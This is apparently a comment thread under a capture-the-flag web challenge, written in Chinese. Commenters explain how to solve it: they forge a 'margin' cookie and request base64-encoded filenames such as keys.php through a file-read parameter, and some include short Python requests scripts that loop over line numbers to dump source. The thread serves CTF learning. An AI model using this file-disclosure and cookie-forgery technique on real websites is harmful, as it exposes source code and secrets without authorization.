这是misc吧
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ 搞到这行就知道怎么伪造cookie了
蠢了,filename后跟keys.php的64编码,不是keys.txt的64编码,难怪一直跑不出来
难度不高,但质量挺好,推荐
跟着攻略做都得不出flag,退钱退钱
import requests print(requests.get('网址/index.php?line=&filename=a2V5cy5waHA=',cookies={'margin': 'margin'}).text)
气死我了line=1是数组第2行,想要找到flag得line=0
火狐浏览器hackbar Url + /index.php?line=&filename=a2V5cy5waHA= cookies:margin=margin
import requests a=25 for i in range(a): url="xxxxx/index.php?line="+str(i)+"&filename=aW5kZXgucGhw==" s=requests.get(url) print(s.text) 跑出源码来就知道怎么做啦:)
url中只需要把文件名改成keys.php的64编码,然后在加上cookie发包,页面为空,f12查看flag
大佬厉害
...
评论
PDXX 9天前
举报
这是misc吧
Yoruko39 25天前
举报
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ 搞到这行就知道怎么伪造cookie了
xixi,mxixi 25天前
举报
蠢了,filename后跟keys.php的64编码,不是keys.txt的64编码,难怪一直跑不出来
Rounty 1月前
举报
难度不高,但质量挺好,推荐
小小菜鸟啊 2月前
举报
跟着攻略做都得不出flag,退钱退钱
char 3月前
举报
import requests print(requests.get('网址/index.php?line=&filename=a2V5cy5waHA=',cookies={'margin': 'margin'}).text)
XmN<=GzR 6月前
举报
气死我了line=1是数组第2行,想要找到flag得line=0
Red_Dusk 8月前
举报
火狐浏览器hackbar Url + /index.php?line=&filename=a2V5cy5waHA= cookies:margin=margin
r0ok1e 9月前
举报
import requests a=25 for i in range(a): url="xxxxx/index.php?line="+str(i)+"&filename=aW5kZXgucGhw==" s=requests.get(url) print(s.text) 跑出源码来就知道怎么做啦:)
一路奔腾 1年前
举报
url中只需要把文件名改成keys.php的64编码,然后在加上cookie发包,页面为空,f12查看flag
菜鸡的小韩 9月前
举报
大佬厉害